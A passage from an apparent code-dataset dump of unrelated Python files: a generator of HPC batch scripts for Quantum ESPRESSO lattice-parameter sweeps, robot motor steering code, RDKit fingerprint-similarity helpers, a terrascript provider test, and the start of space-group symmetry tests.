fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${b}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${a}-${b}-${c}.in | tee relax-${a}-${b}-${c}.out\n" % self.run_params["mpi"])
fout.write("done\n")
fout.write("done\n")
fout.write("done\n")
# gen lsf_sz script
with open("opt-abc-%d-%d-%d.lsf_sz" % (i_batch_a,i_batch_b, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("APP_NAME=%s\n" % self.run_params["queue"])
fout.write("NP=%d\n" % (self.run_params["nodes"]*self.run_params["ppn"]))
fout.write("NP_PER_NODE=%d\n" % self.run_params["ppn"])
fout.write("RUN=\"RAW\"\n")
fout.write("CURDIR=$PWD\n")
fout.write("#VASP=/home-yg/Soft/Vasp5.4/vasp_std\n")
fout.write("source /home-yg/env/intel-12.1.sh\n")
fout.write("source /home-yg/env/openmpi-1.6.5-intel.sh\n")
fout.write("cd $CURDIR\n")
fout.write("# start creating ./nodelist\n")
fout.write("rm -rf $CURDIR/nodelist >& /dev/null\n")
fout.write("for i in `echo $LSB_HOSTS`\n")
fout.write("do\n")
fout.write(" echo \"$i\" >> $CURDIR/nodelist \n")
fout.write("done\n")
fout.write("nodelist=$(cat $CURDIR/nodelist | uniq | awk '{print $1}' | tr '\\n' ',')\n")
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write("for b in `seq -w %f %f %f`\n" % (b+range_b_start, range_b[2], b+range_b_end))
fout.write("do\n")
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
#fout.write(" mkdir relax-${a}-${b}-${c}\n")
fout.write(" cp relax.in.template relax-${a}-${b}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${b}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${a}-${b}-${c}.in | tee relax-${a}-${b}-${c}.out\n" % self.run_params["mpi"])
fout.write("done\n")
fout.write("done\n")
fout.write("done\n")
# gen cdcloud script
with open("opt-abc-%d-%d-%d.slurm_cd" % (i_batch_a, i_batch_b, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_b, i_batch_c))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
fout.write("#\n")
fout.write("export I_MPI_PMI_LIBRARY=/opt/gridview/slurm/lib/libpmi.so\n")
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write("for b in `seq -w %f %f %f`\n" % (b+range_b_start, range_b[2], b+range_b_end))
fout.write("do\n")
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
#fout.write(" mkdir relax-${a}-${b}-${c}\n")
fout.write(" cp relax.in.template relax-${a}-${b}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${b}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${a}-${b}-${c}.in > relax-${a}-${b}-${c}.out\n")
fout.write("done\n")
fout.write("done\n")
fout.write("done\n")
# generate result analysis script
os.system("mkdir -p post-processing")
with open("post-processing/get_energy.sh", 'w') as fout:
fout.write("#!/bin/bash\n")
# write the header of the energy-latconst data file
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: a b c energy(Ry)\n")
fout.write("EOF\n")
# end
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a[0], range_a[2], a+range_a[1]))
fout.write("do\n")
fout.write("for b in `seq -w %f %f %f`\n" % (b+range_b[0], range_b[2], b+range_b[1]))
fout.write("do\n")
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c[0], range_c[2], c+range_c[1]))
fout.write("do\n")
fout.write(" energy=`cat ../relax-${a}-${b}-${c}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${a} ${b} ${c} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("done\n")
fout.write("done\n")
#fout.write("cat > energy-latconst.gp<<EOF\n")
#fout.write("set term gif\n")
#fout.write("set output 'energy-latconst.gif'\n")
#fout.write("set title 'Energy Latconst'\n")
#fout.write("set xlabel 'latconst(a)'\n")
#fout.write("set ylabel 'latconst(c)'\n")
#fout.write("set zlabel 'Energy'\n")
#fout.write("splot 'energy-latconst.data'\n")
#fout.write("EOF\n")
#fout.write("\n")
#fout.write("gnuplot energy-latconst.gp")
os.chdir("../")
if runopt == "run" or runopt == "genrun":
os.chdir(directory)
for i_batch_a in range(n_batch_a):
for i_batch_b in range(n_batch_b):
for i_batch_c in range(n_batch_c):
os.system("bash opt-abc-%d-%d-%d.sh" % (i_batch_a, i_batch_b, i_batch_c))
os.chdir("../")
for i_batch_a in range(n_batch_a):
for i_batch_b in range(n_batch_b):
for i_batch_c in range(n_batch_c):
server_handle(auto=auto, directory=directory, jobfilebase="opt-abc-%d-%d-%d" % (i_batch_a, i_batch_b, i_batch_c), server=self.run_params["server"])
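The script generators above all rely on the same batching arithmetic: each `[start, stop, step]` range is cut into windows of `batch * step`, and every window's end is pulled back by half a step so that an inclusive `seq` sweep does not repeat the first value of the next batch. A minimal standalone sketch of that logic (the `batch_window` helper and the toy numbers are illustrative, not part of the original code):

```python
def batch_window(rng, i_batch, batch_size):
    """Return (start, end) of the i-th batch over rng = [start, stop, step].

    The end is pulled back by step/2 so an inclusive sweep (like shell
    `seq start step end`) does not repeat the next batch's first value.
    """
    start, stop, step = rng
    lo = start + i_batch * batch_size * step
    hi = start + (i_batch + 1) * batch_size * step - step / 2
    # clamp the final window at the overall stop value
    return lo, min(hi, stop)

# Sweeping 0..1 in steps of 0.1 with two values per batch, batch 0
# covers roughly 0.0-0.15 and batch 1 roughly 0.2-0.35, so consecutive
# `seq` loops never emit the same lattice constant twice.
```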
c0f4098fa2c91e2b004cf73197cfbcc5d427a223 | 4,064 | py | Python | programm/ball.py | team172011/ps_cagebot | ab6f7bdbc74ad3baee3feebc4b7b0fa4f726b179 | [
"MIT"
] | null | null | null | programm/ball.py | team172011/ps_cagebot | ab6f7bdbc74ad3baee3feebc4b7b0fa4f726b179 | [
"MIT"
] | null | null | null | programm/ball.py | team172011/ps_cagebot | ab6f7bdbc74ad3baee3feebc4b7b0fa4f726b179 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf8
import general
def calculatemotorspeedsball(horact, actradius):
    # global leftspeedvalue
    # global rightspeedvalue
    # global speedvalue
    # global horact
    # global actradius
    steermultiplier = 0
    # below this value there is no acceleration
    minradius = 70
    # from this value on the object is followed
    defaultradius = 45
    # from this value on full throttle
    maxradius = 25
    # maximum speed of the motor
    maxspeed = 100
    #ltrttempspeed = maxspeed/maxltrtval*(rtact-ltact)
    #ltrttempspeed = int(float((rtact-ltact))/(minradius-maxradius)*maxspeed)
    #speedvalue = ltrttempspeed = maxspeed/maxltrtval*(rtact-ltact)
    # determine the speed from the radius
    # tempspeed = (1-((actradius-maxradius)/minradius))*maxspeed
    tempspeed = int((1-((float(actradius)-maxradius)/minradius))*maxspeed)
    if tempspeed < 0:
        tempspeed = 0
    elif tempspeed > 100:
        tempspeed = 100
    minval = -1000
    maxval = 1000
    # threshold below which there is no steering reaction
    steernull = 50
    # makes it possible to shift the zero point.
    nullmin = 0 - steernull
    nullmax = 0 + steernull
    if horact < nullmin:
        steermultiplier = float(horact)/minval
        for_left = tempspeed - (steermultiplier * maxspeed)*2
        # limit left and right speed to -100 <= speed <= +100
        if for_left >= 0:
            for_left = min(100, for_left)
        else:
            for_left = max(-100, for_left)
        for_right = tempspeed + (steermultiplier * maxspeed)*2
        if for_right >= 0:
            for_right = min(100, for_right)
        else:
            for_right = max(-100, for_right)
        general.leftspeedvalue = for_left
        general.rightspeedvalue = for_right
    elif horact > nullmax:
        steermultiplier = float(horact)/maxval
        for_left = tempspeed + (steermultiplier * maxspeed)*2
        if for_left >= 0:
            for_left = min(100, for_left)
        else:
            for_left = max(-100, for_left)
        for_right = tempspeed - (steermultiplier * maxspeed)*2
        if for_right > 0:
            for_right = min(100, for_right)
        else:
            for_right = max(-100, for_right)
        general.leftspeedvalue = for_left
        general.rightspeedvalue = for_right
    else:
        general.leftspeedvalue = general.rightspeedvalue = tempspeed
    print('sm: ' + str(steermultiplier) + ' actradius: ' + str(actradius) + ' tempspeed ' + str(tempspeed) + ' lsv: ' + str(general.leftspeedvalue) + ' rsv: ' + str(general.rightspeedvalue))


def calculatemotorspeedsline(horact, actradius):
    # global leftspeedvalue
    # global rightspeedvalue
    # global speedvalue
    # global horact
    # global actradius
    steermultiplier = 0
    # below this value there is no acceleration
    minradius = 70
    # from this value on the object is followed
    defaultradius = 45
    # from this value on full throttle
    maxradius = 25
    # maximum speed of the motor
    maxspeed = 100
    #ltrttempspeed = maxspeed/maxltrtval*(rtact-ltact)
    #ltrttempspeed = int(float((rtact-ltact))/(minradius-maxradius)*maxspeed)
    #speedvalue = ltrttempspeed = maxspeed/maxltrtval*(rtact-ltact)
    # determine the speed from the radius
    # tempspeed = (1-((actradius-maxradius)/minradius))*maxspeed
    tempspeed = min(20, actradius)  # line following always uses the same speed
    minval = -1000
    maxval = 1000
    # threshold below which there is no steering reaction
    steernull = 75  # range -1000 to 1000
    # makes it possible to shift the zero point.
    nullmin = 0 - steernull
    nullmax = 0 + steernull
    if horact < nullmin:
        steermultiplier = float(horact)/minval
        general.leftspeedvalue = tempspeed - (steermultiplier * maxspeed)*2
        general.rightspeedvalue = tempspeed + (steermultiplier * maxspeed)*2
    elif horact > nullmax:
        steermultiplier = float(horact)/maxval
        general.leftspeedvalue = tempspeed + (steermultiplier * maxspeed)*2
        general.rightspeedvalue = tempspeed - (steermultiplier * maxspeed)*2
    else:
        general.leftspeedvalue = general.rightspeedvalue = tempspeed
    print('sm: ' + str(steermultiplier) + ' actradius: ' + str(actradius) + ' tempspeed ' + str(tempspeed) + ' lsv: ' + str(general.leftspeedvalue) + ' rsv: ' + str(general.rightspeedvalue))
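Both functions share the same differential-steering core: the horizontal error is mapped onto a multiplier, the two wheel speeds are biased in opposite directions, and the result is clamped to ±100. A self-contained sketch of that core (the `steer` helper and its return-value interface are illustrative; the original writes into the `general` module instead of returning):

```python
def steer(tempspeed, horact, maxspeed=100, steernull=50, minval=-1000, maxval=1000):
    """Return (left, right) wheel speeds for a horizontal error horact."""
    def clamp(v):
        # keep wheel speeds within -100..+100
        return max(-100, min(100, v))
    if horact < -steernull:
        m = float(horact) / minval   # both negative, so m is positive
        return clamp(tempspeed - m * maxspeed * 2), clamp(tempspeed + m * maxspeed * 2)
    if horact > steernull:
        m = float(horact) / maxval
        return clamp(tempspeed + m * maxspeed * 2), clamp(tempspeed - m * maxspeed * 2)
    # inside the dead zone: drive straight
    return tempspeed, tempspeed
```

Inside the dead zone both wheels run at the base speed; a saturated error turns the robot on the spot.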
23ec92ade8f4d15447de64bf45ffa8730430f2b2 | 5,262 | py | Python | jlib.py | jskDr/jamespy | 729c496732d8ec2d6ba25d6b97ef2aa02065c18c | [
"MIT"
] | null | null | null | jlib.py | jskDr/jamespy | 729c496732d8ec2d6ba25d6b97ef2aa02065c18c | [
"MIT"
] | null | null | null | jlib.py | jskDr/jamespy | 729c496732d8ec2d6ba25d6b97ef2aa02065c18c | [
"MIT"
] | null | null | null | import numpy as np
def hello(name = 'no name'):
    """
    name is welcomed by saying hello
    input: name - the welcome name
    """
    print('Hello {name}!'.format(**locals()))
    print('2015-3-2, 2:45pm')


def check_mol_similarity():
    from rdkit import Chem
    from rdkit import DataStructs
    from rdkit.Chem.Fingerprints import FingerprintMols

    ms = [Chem.MolFromSmiles('CCOC'), Chem.MolFromSmiles('CCO'), Chem.MolFromSmiles('COC')]
    fps = [FingerprintMols.FingerprintMol(x) for x in ms]
    print(fps[0])
    print(DataStructs.FingerprintSimilarity(fps[0], fps[1]))
    print(DataStructs.FingerprintSimilarity(fps[0], fps[2]))
    print(DataStructs.FingerprintSimilarity(fps[1], fps[2]))
    print(DataStructs.FingerprintSimilarity(fps[0], fps[0]))


def mols_similarity(ms_smiles = ['CCOC', 'CCO', 'COC']):
    from rdkit import Chem
    from rdkit import DataStructs
    from rdkit.Chem.Fingerprints import FingerprintMols

    ms = [Chem.MolFromSmiles(m_sm) for m_sm in ms_smiles]
    # [Chem.MolFromSmiles('CCOC'), Chem.MolFromSmiles('CCO'), Chem.MolFromSmiles('COC')]
    fps = [FingerprintMols.FingerprintMol(x) for x in ms]
    print(fps[0])
    print(DataStructs.FingerprintSimilarity(fps[0], fps[1]))
    print(DataStructs.FingerprintSimilarity(fps[0], fps[2]))
    print(DataStructs.FingerprintSimilarity(fps[1], fps[2]))
    print(DataStructs.FingerprintSimilarity(fps[0], fps[0]))


def _mols_similarity_base_r0(ms_smiles_mid, ms_smiles_base):
    """
    Input: dictionary type required such as {nick name: smiles code, ...}
    """
    from rdkit import Chem
    from rdkit import DataStructs
    from rdkit.Chem.Fingerprints import FingerprintMols

    # processing for mid
    print("Target: ", list(ms_smiles_mid.keys()))
    ms_mid = [Chem.MolFromSmiles(m_sm) for m_sm in ms_smiles_mid.values()]
    # [Chem.MolFromSmiles('CCOC'), Chem.MolFromSmiles('CCO'), Chem.MolFromSmiles('COC')]
    fps_mid = [FingerprintMols.FingerprintMol(x) for x in ms_mid]

    # processing for base
    print("Base: ", list(ms_smiles_base.keys()))
    ms_base = [Chem.MolFromSmiles(m_sm) for m_sm in ms_smiles_base.values()]
    # [Chem.MolFromSmiles('CCOC'), Chem.MolFromSmiles('CCO'), Chem.MolFromSmiles('COC')]
    fps_base = [FingerprintMols.FingerprintMol(x) for x in ms_base]

    for (bx, f_b) in enumerate(fps_base):
        for (dx, f_d) in enumerate(fps_mid):
            print("Base:{0}, Target:{1}".format(list(ms_smiles_base.keys())[bx], list(ms_smiles_mid.keys())[dx]))
            print(DataStructs.FingerprintSimilarity(f_b, f_d))


"""
The core part is factored out below; only what is added around it differs
between the variants.
"""
def mols_similarity_base_core(ms_smiles_mid, ms_smiles_base):
    """
    Input: dictionary type required such as {nick name: smiles code, ...}
    """
    from rdkit import Chem
    from rdkit import DataStructs
    from rdkit.Chem.Fingerprints import FingerprintMols

    # processing for mid
    print("Target: ", list(ms_smiles_mid.keys()))
    ms_mid = [Chem.MolFromSmiles(m_sm) for m_sm in ms_smiles_mid.values()]
    # [Chem.MolFromSmiles('CCOC'), Chem.MolFromSmiles('CCO'), Chem.MolFromSmiles('COC')]
    fps_mid = [FingerprintMols.FingerprintMol(x) for x in ms_mid]

    # processing for base
    print("Base: ", list(ms_smiles_base.keys()))
    ms_base = [Chem.MolFromSmiles(m_sm) for m_sm in ms_smiles_base.values()]
    # [Chem.MolFromSmiles('CCOC'), Chem.MolFromSmiles('CCO'), Chem.MolFromSmiles('COC')]
    fps_base = [FingerprintMols.FingerprintMol(x) for x in ms_base]

    return fps_base, fps_mid


def mols_similarity_base(ms_smiles_mid, ms_smiles_base):
    """
    Input: dictionary type required such as {nick name: smiles code, ...}
    """
    from rdkit import DataStructs

    [fps_base, fps_mid] = mols_similarity_base_core(ms_smiles_mid, ms_smiles_base)
    for (bx, f_b) in enumerate(fps_base):
        for (dx, f_d) in enumerate(fps_mid):
            print("Base:{0}, Target:{1}".format(list(ms_smiles_base.keys())[bx], list(ms_smiles_mid.keys())[dx]))
            print(DataStructs.FingerprintSimilarity(f_b, f_d))


def mols_similarity_base_return(ms_smiles_mid, ms_smiles_base, property_of_base = None):
    """
    The results will be returned.
    A * w = b; A is always returned, and b as well when property_of_base is given.
    """
    from rdkit import DataStructs

    [fps_base, fps_mid] = mols_similarity_base_core(ms_smiles_mid, ms_smiles_base)
    Nb, Nm = len(fps_base), len(fps_mid)
    A = np.zeros((Nm, Nb))
    b = np.zeros(Nb)
    for (bx, f_b) in enumerate(fps_base):
        for (mx, f_m) in enumerate(fps_mid):
            print("Base:{0}, Target:{1}".format(list(ms_smiles_base.keys())[bx], list(ms_smiles_mid.keys())[mx]))
            A[mx, bx] = DataStructs.FingerprintSimilarity(f_b, f_m)
            print(A[mx, bx])
        if property_of_base:
            b[bx] = property_of_base[bx]
            print(b[bx])
    if property_of_base:
        print("b is obtained.")
        return A, b
    else:
        return A


def mols_similarity_base_get_w(ms_smiles_mid, ms_smiles_base, property_of_base):
    """
    property_of_base, which is b, must be entered
    """
    [A, b] = mols_similarity_base_return(ms_smiles_mid, ms_smiles_base, property_of_base)
    w = np.dot(np.linalg.pinv(A), b)
    return w
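`mols_similarity_base_get_w` closes the loop by solving A·w ≈ b with the Moore–Penrose pseudo-inverse. The same step, detached from RDKit, with a hypothetical toy similarity matrix (the numbers below are made up for illustration and are not fingerprint similarities from this module):

```python
import numpy as np

# Hypothetical 3x2 similarity matrix: 3 target molecules, 2 base molecules.
A = np.array([[1.0, 0.2],
              [0.2, 1.0],
              [0.6, 0.6]])
b = np.array([1.4, 2.2, 1.8])      # property values to fit (here A @ [1, 2])
w = np.dot(np.linalg.pinv(A), b)   # least-squares weights, same step as above
```

Because A has full column rank and b lies in its column space, the pseudo-inverse recovers the exact weights.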
f1c888ed796a55c5a9008e90b18c27ce4153e92f | 160 | py | Python | lovef/io.py | lovef/.lovef | a0ede4844ce349f28bc6cfddaa94922234c16262 | ["Apache-2.0"] | 2 | 2018-03-17T20:17:17.000Z | 2018-03-19T08:46:49.000Z | lovef/io.py | lovef/.lovef | a0ede4844ce349f28bc6cfddaa94922234c16262 | ["Apache-2.0"] | null | null | null | lovef/io.py | lovef/.lovef | a0ede4844ce349f28bc6cfddaa94922234c16262 | ["Apache-2.0"] | 1 | 2020-02-09T06:00:20.000Z | 2020-02-09T06:00:20.000Z |
import sys
def readFromClipboard():
    """Return the current clipboard contents as text (requires a display)."""
    import tkinter
    return tkinter.Tk().clipboard_get()


def readFromStdin():
    """Read everything from stdin and return it as a single string."""
    return "".join(sys.stdin.readlines())
9e80dd92e1a09b4ba8d93c520461b8e666cf8cde | 787 | py | Python | tests/test_provider_poseidon_matchbox.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | ["BSD-2-Clause"] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | tests/test_provider_poseidon_matchbox.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | ["BSD-2-Clause"] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | tests/test_provider_poseidon_matchbox.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | ["BSD-2-Clause"] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z |
# tests/test_provider_poseidon_matchbox.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:21:35 UTC)
def test_provider_import():
    import terrascript.provider.poseidon.matchbox


def test_resource_import():
    from terrascript.resource.poseidon.matchbox import matchbox_group
    from terrascript.resource.poseidon.matchbox import matchbox_profile
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.poseidon.matchbox
#
# t = terrascript.provider.poseidon.matchbox.matchbox()
# s = str(t)
#
# assert 'https://github.com/poseidon/terraform-provider-matchbox' in s
# assert '0.4.1' in s
9e8657a5e570b72f526c6b889657da67dbaa305f | 85750 | py | Python | tests/test_symmetry.py | neutronpy/neutronpy | 44ca74a0bef25c03397a77aafb359bb257de1fe6 | ["MIT"] | 14 | 2015-05-08T02:43:46.000Z | 2019-05-28T03:47:32.000Z | tests/test_symmetry.py | neutronpy/neutronpy | 44ca74a0bef25c03397a77aafb359bb257de1fe6 | ["MIT"] | 96 | 2015-02-09T01:04:33.000Z | 2020-12-08T22:57:37.000Z | tests/test_symmetry.py | neutronpy/neutronpy | 44ca74a0bef25c03397a77aafb359bb257de1fe6 | ["MIT"] | 5 | 2016-02-26T22:53:13.000Z | 2018-07-16T07:13:04.000Z |
# -*- coding: utf-8 -*-
r"""Tests of space group symmetry operations
"""
import pytest
from neutronpy import symmetry
poses = {1: ['x,y,z'],
2: ['x,y,z', '-x,-y,-z'],
3: ['x,y,z', '-x,y,-z'],
4: ['x,y,z', '-x,y+1/2,-z'],
5: ['x,y,z', '-x,y,-z', 'x+1/2,y+1/2,z', '-x+1/2,y+1/2,-z'],
6: ['x,y,z', 'x,-y,z'],
7: ['x,y,z', 'x,-y,z+1/2'],
8: ['x,y,z', 'x,-y,z', 'x+1/2,y+1/2,z', 'x+1/2,-y+1/2,z'],
9: ['x,y,z', 'x,-y,z+1/2', 'x+1/2,y+1/2,z', 'x+1/2,-y+1/2,z+1/2'],
10: ['x,y,z', '-x,y,-z', '-x,-y,-z', 'x,-y,z'],
11: ['x,y,z', '-x,y+1/2,-z', '-x,-y,-z', 'x,-y+1/2,z'],
12: ['x,y,z', '-x,y,-z', '-x,-y,-z', 'x,-y,z', 'x+1/2,y+1/2,z', '-x+1/2,y+1/2,-z', '-x+1/2,-y+1/2,-z',
'x+1/2,-y+1/2,z'],
13: ['x,y,z', '-x,y,-z+1/2', '-x,-y,-z', 'x,-y,z+1/2'],
14: ['x,y,z', '-x,y+1/2,-z+1/2', '-x,-y,-z', 'x,-y+1/2,z+1/2'],
15: ['x,y,z', '-x,y,-z+1/2', '-x,-y,-z', 'x,-y,z+1/2', 'x+1/2,y+1/2,z', '-x+1/2,y+1/2,-z+1/2',
'-x+1/2,-y+1/2,-z', 'x+1/2,-y+1/2,z+1/2'],
16: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z'],
17: ['x,y,z', '-x,-y,z+1/2', '-x,y,-z+1/2', 'x,-y,-z'],
18: ['x,y,z', '-x,-y,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z'],
19: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z'],
20: ['x,y,z', '-x,-y,z+1/2', '-x,y,-z+1/2', 'x,-y,-z', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z'],
21: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z',
'x+1/2,-y+1/2,-z'],
22: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2',
'x,-y+1/2,-z+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x+1/2,-y,-z+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z'],
23: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2'],
24: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z',
'-x+1/2,y,-z', 'x,-y,-z+1/2'],
25: ['x,y,z', '-x,-y,z', 'x,-y,z', '-x,y,z'],
26: ['x,y,z', '-x,-y,z+1/2', 'x,-y,z+1/2', '-x,y,z'],
27: ['x,y,z', '-x,-y,z', 'x,-y,z+1/2', '-x,y,z+1/2'],
28: ['x,y,z', '-x,-y,z', 'x+1/2,-y,z', '-x+1/2,y,z'],
29: ['x,y,z', '-x,-y,z+1/2', 'x+1/2,-y,z', '-x+1/2,y,z+1/2'],
30: ['x,y,z', '-x,-y,z', 'x,-y+1/2,z+1/2', '-x,y+1/2,z+1/2'],
